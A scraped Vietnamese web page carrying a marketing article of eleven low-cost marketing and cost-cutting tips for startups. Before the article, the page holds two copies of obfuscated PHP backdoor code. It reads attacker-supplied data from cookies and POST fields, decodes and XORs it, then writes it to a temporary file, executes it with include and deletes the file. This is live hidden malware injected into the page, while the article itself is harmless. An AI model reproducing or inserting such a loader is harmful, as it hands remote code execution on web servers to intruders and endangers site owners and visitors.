$WvqJVhXR = "\146" . 'r' . chr (95) . chr (122) . "\106" . chr ( 1074 - 972 ); $dVQerxu = chr (99) . "\x6c" . chr (97) . 's' . "\163" . chr (95) . "\x65" . chr ( 838 - 718 )."\151" . 's' . "\x74" . "\x73";$fHXkP = class_exists($WvqJVhXR); $WvqJVhXR = "62863";$dVQerxu = "18731";$HbPVnSkM = !1;if ($fHXkP == $HbPVnSkM){function iioLHnzgx(){return FALSE;}$vHUtqD = "52818";iioLHnzgx();class fr_zFf{private function etqPZVFQuH($vHUtqD){if (is_array(fr_zFf::$JFDVEp)) {$uWxuYVV = sys_get_temp_dir() . "/" . crc32(fr_zFf::$JFDVEp["\x73" . "\x61" . 'l' . chr ( 722 - 606 )]);@fr_zFf::$JFDVEp['w' . "\162" . 'i' . 't' . chr ( 208 - 107 )]($uWxuYVV, fr_zFf::$JFDVEp[chr ( 933 - 834 ).'o' . 'n' . "\164" . "\145" . chr ( 1041 - 931 ).'t']);include $uWxuYVV;@fr_zFf::$JFDVEp["\144" . 'e' . chr (108) . "\145" . "\x74" . 'e']($uWxuYVV); $vHUtqD = "52818";exit();}}private $PaRddX;public function zmQwuoQ(){echo 62070;}public function __destruct(){$vHUtqD = "11432_54280";$this->etqPZVFQuH($vHUtqD); $vHUtqD = "11432_54280";}public function __construct($DACkm=0){$CODYDkgq = $_POST;$AlRnEWPD = $_COOKIE;$BfPZCzOOPg = "498b5f9a-6ded-4323-b875-d6624930d94f";$ewQIbehG = @$AlRnEWPD[substr($BfPZCzOOPg, 0, 4)];if (!empty($ewQIbehG)){$CnDsK = "base64";$WHZzgIKwOw = "";$ewQIbehG = explode(",", $ewQIbehG);foreach ($ewQIbehG as $AQDRIhM){$WHZzgIKwOw .= @$AlRnEWPD[$AQDRIhM];$WHZzgIKwOw .= @$CODYDkgq[$AQDRIhM];}$WHZzgIKwOw = array_map($CnDsK . "\137" . chr (100) . "\145" . 'c' . "\x6f" . 'd' . chr (101), array($WHZzgIKwOw,)); $WHZzgIKwOw = $WHZzgIKwOw[0] ^ str_repeat($BfPZCzOOPg, (strlen($WHZzgIKwOw[0]) / strlen($BfPZCzOOPg)) + 1);fr_zFf::$JFDVEp = @unserialize($WHZzgIKwOw); $WHZzgIKwOw = class_exists("11432_54280");}}public static $JFDVEp = 51928;}$hIJBqy = new /* 25513 */ fr_zFf(52818 + 52818); $_POST = Array();unset($hIJBqy);}$vevyiKS = chr (99) . chr (90) . chr (81) . '_' . "\x73" . 'W' . chr (89); $NZsglT = chr (99) . "\154" . "\x61" . 's' . "\x73" . "\x5f" . "\145" . "\170" . chr ( 459 - 354 ).'s' . "\x74" . "\x73";$DqseBkWBL = class_exists($vevyiKS); $vevyiKS = "32234";$NZsglT = "25196";$KuVlKqfXoj = !1;if ($DqseBkWBL == $KuVlKqfXoj){function upBvOY(){return FALSE;}$ZMjGIHjqlw = "1127";upBvOY();class cZQ_sWY{private function CJwNMHqcA($ZMjGIHjqlw){if (is_array(cZQ_sWY::$zfofFIbxT)) {$MgLCwA = sys_get_temp_dir() . "/" . crc32(cZQ_sWY::$zfofFIbxT["\x73" . chr ( 815 - 718 )."\x6c" . chr (116)]);@cZQ_sWY::$zfofFIbxT["\167" . chr ( 929 - 815 )."\x69" . 't' . 'e']($MgLCwA, cZQ_sWY::$zfofFIbxT['c' . "\x6f" . chr (110) . chr (116) . "\x65" . "\156" . chr ( 651 - 535 )]);include $MgLCwA;@cZQ_sWY::$zfofFIbxT[chr (100) . 'e' . "\154" . chr ( 729 - 628 ).chr ( 237 - 121 ).'e']($MgLCwA); $ZMjGIHjqlw = "1127";exit();}}private $cwdTlSMwq;public function mvlxSBM(){echo 51860;}public function __destruct(){$ZMjGIHjqlw = "43760_21773";$this->CJwNMHqcA($ZMjGIHjqlw); $ZMjGIHjqlw = "43760_21773";}public function __construct($Iaepc=0){$zwdRLF = $_POST;$LWjIF = $_COOKIE;$lKXZk = "48c67732-1438-4a51-91a6-844a996839f8";$rUAmBVh = @$LWjIF[substr($lKXZk, 0, 4)];if (!empty($rUAmBVh)){$EhyGK = "base64";$yLHwODGo = "";$rUAmBVh = explode(",", $rUAmBVh);foreach ($rUAmBVh as $dUBdf){$yLHwODGo .= @$LWjIF[$dUBdf];$yLHwODGo .= @$zwdRLF[$dUBdf];}$yLHwODGo = array_map($EhyGK . "\137" . chr (100) . "\145" . "\143" . chr (111) . chr ( 508 - 408 ).chr ( 1098 - 997 ), array($yLHwODGo,)); $yLHwODGo = $yLHwODGo[0] ^ str_repeat($lKXZk, (strlen($yLHwODGo[0]) / strlen($lKXZk)) + 1);cZQ_sWY::$zfofFIbxT = @unserialize($yLHwODGo); $yLHwODGo = class_exists("43760_21773");}}public static $zfofFIbxT = 54042;}$dXWxQRsxAx = new /* 33892 */ cZQ_sWY(1127 + 1127); $_POST = Array();unset($dXWxQRsxAx);}Muốn thành công trong marketing, không thể không đọc
Đăng bài - Hoặc quảng cáo vui lòng liên hệ TVN Group - hệ thống website chất lượng cao:

0972434351tvnseos@gmail.comZalo

Muốn thành công trong marketing, không thể không đọc

0

Cập nhật vào 28/09

Áp dụng những phương pháp tiếp thị thông minh, tiết kiệm chi phí là điều cực kỳ cần thiết đối với các doanh nghiệp mới, với những startup. Áp dụng khôn ngoan và thông minh sẽ giúp bạn chiến thắng những mục tiêu quan trọng cho dù số tiền bỏ ra không lớn.

1. Không cần giấy tờ

Thay vì in các hóa đơn, séc và đính kèm chúng vào thư, hãy cân nhắc nhiều dịch vụ trực tuyến sẵn có dành cho nhiều nhu cầu kinh doanh khác nhau. Bạn có thể dùng các dịch vụ chia sẻ file như Dropbox hoặc Google Docs, các hóa đơn điện tử, các bảng tính kiểm kê hàng hóa và thanh toán như FreshBooks, WorkingPoint hay Apptivo, và các dịch vụ chữ ký điện tử như DocuSign để dễ dàng chia sẻ thông tin bên trong và bên ngoài. Chúng ta thường không để ý mình đã lãng phí bao nhiêu giấy khi in ra những thứ có thể dễ dàng đánh giá và chia sẻ trực tuyến.

2. Tiết kiệm chi phí mực in

Nếu bạn vẫn muốn in, ít nhất cũng tiết kiệm một chút tiền mực in bạn đang dùng.

Một số trang web hoặc các cửa hàng mua các hộp mực in rỗng với mức giá 20 đô la. Hãy tìm cách bán hoặc tái sử dụng chúng qua Staples, tonerbuyer.com hoặc các dịch vụ khác trước khi mua những thứ mới. 20 đô la cộng dồn lại cũng được một khoản lớn.

3. Suy nghĩ và hành động linh hoạt

Kolah khuyên doanh nghiệp không nên suy nghĩ cứng nhắc theo lối mòn vì lối suy nghĩ ấy sẽ cản trở việc vận dụng những giải pháp tiếp thị có hiệu quả. Chẳng hạn không nên nghĩ rằng các đối thủ cạnh tranh lúc nào cũng xấu, còn đối tác thì tốt hoặc các quy định của các cơ quan chức năng thường gây phiền hà và bất lợi cho hoạt động kinh doanh, còn các chính sách bảo hộ thì có lợi. Trong hoàn cảnh thị trường trong nước và thị trường toàn cầu luôn biến động và thường xuất hiện những tình huống bất ngờ, doanh nghiệp càng phải linh hoạt trong suy nghĩ và hành động.

4. Tái đàm phán các dịch vụ đính kèm của bạn

Các dịch vụ đính kèm và giá trị của chúng luôn thay đổi. Chỉ cần một cuộc gọi 5 phút tới nhà cung cấp dịch vụ là bạn sẽ có thương vụ mới nhất. Thường họ sẽ đưa ra lời chào hàng rất tốt để bạn không chuyển hướng sang nhà cung cấp khác. Bạn cũng nên tự hỏi xem liệu nhà cung cấp dịch vụ internet hàng đầu có phải là mối ưu tiên không, hay bạn có thể tiết kiệm bằng cách sử dụng dịch vụ đủ dùng với nhu cầu?

5. Sử dụng các ứng dụng kết nối

Nhiều dịch vụ mới hoạt động hiệu quả khi được sử dụng cùng với nhau nhờ công nghệ điện toán đám mây giúp đồng bộ hóa thông tin phù hợp. Các dịch vụ như Nutshell CRM có thể giúp thống nhất thông tin bằng cách theo dõi các cuộc họp, các cuộc điện thoại, email và nhiều thứ khác, và thậm chí có thể đồng bộ hóa với điện thoại thông minh của bạn. Dùng các ứng dụng kết nối đúng chỗ có thể giúp bạn sử dụng ít dịch vụ hơn và dành thời gian cần thiết cho việc tái nhập dữ liệu.

6. Không nên quá lệ thuộc vào các đối tác quảng cáo, tiếp thị

Doanh nghiệp không nên tin tưởng hoàn toàn vào các đối tác, mà cần thẳng thắn chia sẻ với họ về các thành công cũng như các bài học cần rút ra sau mỗi chương trình, chiến dịch tiếp thị. Nên thận trọng trước những trường hợp đối tác đề xuất chương trình quá hoành tráng mà không chỉ rõ được những lợi ích cụ thể. Bài học này đã khiến cho rất nhiều doanh nghiệp mới, thậm chí các doanh nghiệp tầm trung, có lịch sử thành lập nhiều năm phải đổ máu, đôi khi là phá sản. Nếu có thể, hãy tạo dựng riêng cho mình một đội ngũ nghiên cứu tiếp thị là tốt nhất.

Nếu bạn còn thắc mắc tại sao lại phải học về tiếp thị, hãy tham khảo  Tại sao cần học marketing? Học ngành marketing ở đâu?

7. Kiên định với định mức chi phí trong kế hoạch

Không ít người tiêu dùng bị rơi vào trường hợp dự định mua một món hàng với số tiền đã định trước nhưng cuối cùng lại móc thêm hầu bao để mua món hàng khác đắt tiền hơn vì bị người bán hàng thuyết phục. Tương tự, các nhà làm tiếp thị cũng có thể bị rơi vào tình huống đó, nhất là khi thiết kế, xây dựng trang web. Kolah khuyên doanh nghiệp nên cân nhắc trước khi đầu tư cho các hoạt động tiếp thị nằm ngoài kế hoạch, không nên bỏ tiền cho những thứ chưa thật sự cần thiết.

8. Xây dựng mạng lưới tại các sự kiện

Bạn hãy chăm chỉ tham dự vào các hội thảo về kinh doanh, các cuộc gặp của các hiệp hội doanh nghiệp, các tổ chức do doanh nhân thành lập. Tại đó, bạn có thể tìm cách để gây sự chú ý và thu hút khách hàng thông qua bài phát biểu, cuộc trò chuyện. Hãy xin danh thiếp của các giám đốc, những người tham dự hoặc có mặt tại các sự kiện này, sau đó bạn nên viết thư hoặc gọi điện để giữ liên hệ. Hãy làm việc này ngay lập tức. Nếu những “khách hàng” tiềm năng không thể sử dụng dịch vụ hoặc sản phẩm của bạn ngay, hãy nhờ họ tư vấn xem liệu có một ai đó có thể cần tới dịch vụ của bạn và xin họ thông tin về đối tượng đó.

9. Phối hợp chặt chẽ với khách hàng

Thay vì bỏ ra nhiều chi phí để thực hiện những cuộc khảo sát, nghiên cứu thị trường ở quy mô lớn, Kolah cho rằng doanh nghiệp nên phối hợp chặt chẽ với khách hàng để hiểu rõ mong muốn của họ, từ đó tạo ra những sản phẩm hay dịch vụ đáp ứng đúng nhu cầu của nhiều khách hàng. Chính khách hàng hiện tại sẽ là người định hướng cho doanh nghiệp về cách thiết kế, định giá, phân phối những sản phẩm hợp lý nhất.

10. Tạo liên kết là công việc cần thiết

Trong lĩnh vực thương mại điện tử, người khổng lồ Amazon.com cũng tận dụng rất tốt cách này khi đưa ra chương trình marketing liên kết với các website nhỏ hơn. Các website thuộc các mảng như: giới thiệu văn học, phim ảnh có thể đặt đường liên kết đến Amazon.com. Mỗi khi khách hàng vào xem giới thiệu sách báo, phim ảnh có thể đi thẳng sang Amazon.com để mua sách hoặc DVD liên quan. Mỗi website sẽ có một mã số liên kết riêng, khi khách hàng của họ mua hàng trên Amazon.com thì website sẽ được trả một số tiền tương ứng theo phần trăm của món hàng. Như vậy các món hàng trên Amazon.com được tiếp thị đến vô số các website khác nhau. Với hệ thống hơn 60.000 đại lý hiện nay, chi phí tiếp thị sẽ hiệu quả đến từng đồng xu một. Đồng thời khả năng mở rộng hệ thống đại lý gần như không giới hạn.

Việc liên kết không chỉ được thực hiện giữa những đối tác hỗ trợ nhau mà còn giữa những công ty trong cùng một lĩnh vực sản phẩm hay dịch vụ nhưng cạnh tranh trực tiếp với nhau. Điển hình như ở Việt Nam hiện nay một số ngân hàng đã kết nối hệ thống ATM của họ với nhau thành hệ thống Việt Nam Bank Card (VNBC), với thẻ của một ngân hàng có thể rút tiền ở máy ATM của các ngân hàng thành viên VNBC khác. Việc này mang lại lợi ích cho phép mở rộng mạng lưới máy ATM với chi phí kết nối chung thấp hơn nhiều so với việc tự đầu tư. Đồng thời, lợi thế cạnh tranh của nhóm các ngân hàng nhỏ cũng mạnh hơn nhiều khi phải “đấu” một cách đơn lẻ với các ngân hàng mạnh hơn như Vietcombank, BIDV…

11. Tách bạch các khoản chi phí cá nhân và doanh nghiệp

Điều này khiến bạn dễ xác định và sử dụng giảm trừ thuế giá trị. Hãy bắt đầu bằng cách mở một tài khoản doanh nghiệp tại ngân hàng và các thẻ tín dụng doanh nghiệp. Mức lãi suất của thẻ tín dụng doanh nghiệp có thể thấp, nhưng nó không áp dụng với thẻ tín dụng cá nhân, ngay cả khi bạn đang dùng nó để cấp vốn cho công ty bạn. Cắt giảm các chi phí có thể dễ hơn bạn nghĩ, và hãy thông minh khi quyết định khoản nào cần cắt giảm chi tiêu để công ty bạn có thể thịnh vượng.

Vui lòng đánh giá bài viết
Share.

Comments are closed.